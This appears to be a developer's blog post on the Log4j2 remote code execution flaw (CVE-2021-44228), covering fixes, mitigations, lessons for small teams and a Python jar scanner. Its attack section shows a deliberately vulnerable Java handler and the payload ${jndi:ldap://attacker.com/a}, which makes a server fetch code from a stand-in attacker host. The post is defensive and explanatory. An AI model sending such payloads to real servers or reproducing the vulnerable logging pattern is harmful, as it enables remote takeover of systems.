Background of the event

On December 10, I saw that some people in my circle of friends had been patching and redeploying their systems all night. Then I saw the official advisories issued by Alibaba Cloud Security and Tencent Security: "Apache Log4j2 has a remote code execution vulnerability", and the vulnerability had already been made public.

Our old projects use log4j and the new ones use logback. Then I saw the news in my circle of friends.

An event of this magnitude made an urgent fix inevitable. As a programmer, if you see this news and cannot even check your own systems, you are really not a qualified programmer.

After this incident, we should not just watch the excitement but also think about how a small company can avoid, prevent, and prepare for this kind of bug.

Vulnerability description

Apache Log4j2 is an excellent Java logging framework, on par with Logback. Many major open source frameworks have adopted Log4j2, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink and others. The impact of a problem in such a foundational framework can therefore be imagined.

Vulnerability information (CVE-2021-44228): the first fix, Apache Log4j 2.15.0-RC1, could be bypassed; update to Apache Log4j 2.15.0-rc2, which was released as 2.15.0.

Affected versions: 2.0-beta9 <= Apache Log4j2 <= 2.14.1

Latest fix: github.com/apache/logg…

Remedy

Option 1: Upgrade to the fixed version and release the system. Note that 2.15.0 did not stay the final fix: Apache published 2.16.0 and then 2.17.0 shortly afterwards because the 2.15.0 fix was incomplete in some configurations, so upgrade to the latest 2.x release rather than stopping at 2.15.0.

Option 2: Temporary mitigation. These are stopgaps until the upgrade is out; the formatMsgNoLookups switch only exists in Log4j 2.10 and later, and it was later shown not to cover every configuration, so it does not replace the upgrade:

  • Add the JVM parameter -Dlog4j2.formatMsgNoLookups=true.
  • Add a log4j2.component.properties file to the classpath of each affected project containing the line log4j2.formatMsgNoLookups=true.
  • Set the environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true (Apache's advisory documents the equivalent LOG4J_FORMAT_MSG_NO_LOOKUPS=true).
  • For versions older than 2.10, where the switch does not exist, remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar.

Attack principle

Example of a vulnerable HTTP handler (pseudocode in the original, made compilable against the Log4j2 API here):

```java
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import com.sun.net.httpserver.HttpServer;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;

public class VulnerableLog4jExampleHandler implements HttpHandler {
    static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class);

    /**
     * A simple HTTP endpoint that reads the User-Agent header and logs it.
     */
    @Override
    public void handle(HttpExchange he) throws IOException {
        // The User-Agent header is entirely attacker-controlled.
        String userAgent = he.getRequestHeaders().getFirst("User-Agent");

        // This logging call triggers the RCE on log4j-core 2.0-beta9 .. 2.14.1:
        // the attacker sets User-Agent: ${jndi:ldap://attacker.com/a} and Log4j2
        // resolves the lookup, connecting to the attacker's server and loading its code.
        log.info("Request User Agent: " + userAgent);

        String response = "<h1>Hello There, " + userAgent + "!</h1>";
        byte[] body = response.getBytes(StandardCharsets.UTF_8);
        he.sendResponseHeaders(200, body.length);
        try (OutputStream os = he.getResponseBody()) {
            os.write(body);
        }
    }

    public static void main(String[] args) throws IOException {
        HttpServer server = HttpServer.create(new InetSocketAddress(8080), 0);
        server.createContext("/", new VulnerableLog4jExampleHandler());
        server.start();
    }
}
```

Basic attack steps against the code above:

  • The attacker sends a request to the HTTP endpoint (or API) with the payload in a request field that the application logs, for example the User-Agent header set to ${jndi:ldap://attacker.com/a}.
  • When the server logs the request with Log4j2, the logged message contains the JNDI/LDAP lookup ${jndi:ldap://attacker.com/a}, where attacker.com is an address controlled by the attacker.
  • Log4j2 resolves the lookup while formatting the message, which makes the server open a connection to the attacker-controlled address.
  • The response to that lookup returns executable malicious code that is loaded into the server process, for example from attacker.com/Attack.clas… .
  • The loaded code then runs, and the attacker controls the server.

Tencent's security team reproduced the attack; the screenshots of their reproduction are not included in this copy.

What can small business programmers do?

The vulnerability and its remedies have been covered in detail above, and the immediate problem is basically solved. Large Internet companies have a dedicated security operations department that monitors and scans for such vulnerabilities. Small companies obviously have no such thing.

So what do we do? And, treating the event as a learning experience, have you thought about the other issues it reveals?

First, did you get the news right away?

In large companies, the security department is the first to be notified when such a vulnerability is discovered. In a small company with no security department, how do you hear about a vulnerability?

For example, the company I work for has no security department, but we still learned of the vulnerability almost immediately and checked our systems.

If, as a programmer, news of a vulnerability has been public for a long time and you still do not know about it, you might want to rethink the quality of your social media and how closely you follow technical news.

How quickly first-hand information reaches you depends on, and reflects, where you stand in the social or technical community.

Second, did you turn a deaf ear?

Many friends may have seen the news of the vulnerability but only watched the excitement and then did nothing: if the system has a bug, so be it.

If this describes you or your team, you really need to examine your professionalism.

Many of us feel that we are good, that we are underappreciated, that we are underpaid, that we are mistreated... Well, look at your reaction to this event and you will probably know whether you are really being mistreated.

Third, how do you respond to an emergency?

An emergency like this also tests system operation and maintenance and team management, and serves as a drill: everyone is developing current business features when an unexpected bug has to be fixed. What do you do with code that is only half changed? How do you release a large number of services at once?

First, what about code that is only half changed? If all of your team's development happens directly on master (the trunk), you will inevitably face half-finished, untested changes that would have to be released together with the fix.

Therefore, code management (how to branch, how to merge branches, and how to release branches to different environments from the trunk) must be practiced every day, so that when something unexpected happens it is not a mess.

Second, what if you have a large number of projects to release? The oldest way is to release manually, system by system. With many microservices and applications this is error-prone and time-consuming, which is a reminder of the importance of building an automated release process.

Fourth, how do you find vulnerabilities in your systems?

Companies with a security department regularly scan their systems for vulnerabilities. Are companies without one just sitting ducks?

There are ways to find vulnerabilities in your own systems: pay close attention to version upgrades of the frameworks you use, use third-party vulnerability scanning (such as Alibaba Cloud's server security scanning), and exchange information with peers.
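One concrete way to do that scanning yourself, which also covers the jar-level mitigation listed under Remedy above, is to inventory the log4j-core jars on each host. The example below is added here and is not from the original post: it walks a directory tree for log4j-core jars, reads the version from the manifest's Implementation-Version attribute (which log4j-core's manifest carries), checks whether the JndiLookup class is present, and can write a copy of the jar with that class removed, Apache's documented mitigation for versions older than 2.10 where log4j2.formatMsgNoLookups does not exist. The version range 2.0 to 2.14.1 is the one quoted above. make_fake_log4j_core builds a constructed stand-in jar so the example runs offline; it is test input, not a real Log4j build.

```python
import io
import re
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Class whose presence makes ${jndi:...} lookups resolvable in log4j-core 2.x.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
_IMPL_VERSION = re.compile(r"^Implementation-Version:\s*(\S+)", re.MULTILINE)
# Affected range from the advisory quoted above (2.0-beta9 .. 2.14.1).
AFFECTED_LOW, AFFECTED_HIGH = (2, 0), (2, 14, 1)


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); pre-release suffixes such as '2.0-beta9' are dropped,
    so every 2.0 pre-release is treated as affected (conservative)."""
    return tuple(int(p) for p in re.findall(r"\d+", version.split("-", 1)[0]))


def inspect_log4j_jar(data: bytes) -> Dict[str, object]:
    """Report the manifest version and whether JndiLookup.class is present in a jar."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version: Optional[str] = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            match = _IMPL_VERSION.search(manifest)
            if match:
                version = match.group(1)
    has_jndi = JNDI_LOOKUP_CLASS in names
    in_range = version is not None and AFFECTED_LOW <= parse_version(version) <= AFFECTED_HIGH
    return {"version": version, "jndi_lookup_present": has_jndi, "vulnerable": has_jndi and in_range}


def strip_jndi_lookup(data: bytes) -> bytes:
    """Return a copy of the jar without JndiLookup.class, the same effect as deleting the
    entry with a zip tool. Every other entry is copied unchanged."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def scan_tree(root: Path) -> List[Tuple[Path, Dict[str, object]]]:
    """Find every log4j-core jar under root and inspect it (shaded or nested jars are not unpacked)."""
    return [(p, inspect_log4j_jar(p.read_bytes())) for p in root.rglob("log4j-core-*.jar")]


def make_fake_log4j_core(version: str, with_jndi: bool = True) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar: a manifest plus dummy class entries.
    Test input for this example only, not a real Log4j build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\nImplementation-Version: %s\n" % version)
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    jar = make_fake_log4j_core("2.14.1")
    print("before:", inspect_log4j_jar(jar))
    print("after :", inspect_log4j_jar(strip_jndi_lookup(jar)))
```

On a real host, call scan_tree on the application and library directories; applications that bundle Log4j inside a fat jar or war need the archive unpacked first, since this version only looks at top-level log4j-core jars. Keep the affected range in step with the advisory you are working from, since it changed as later releases were published.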

Summary

Any vulnerability in a software system may be fatal, and we need to treat each one carefully. How you deal with and react to vulnerabilities also reflects your professionalism as a practitioner.

You will grow faster if you learn and think more from each incident.

About the blogger: author of the technical book SpringBoot Inside Technology; loves to delve into technology and writes technical articles.

Public account: "Program New Vision", the blogger's WeChat public account; welcome to follow ~

Technical exchange: please contact the Weibo user Zhuan2quan
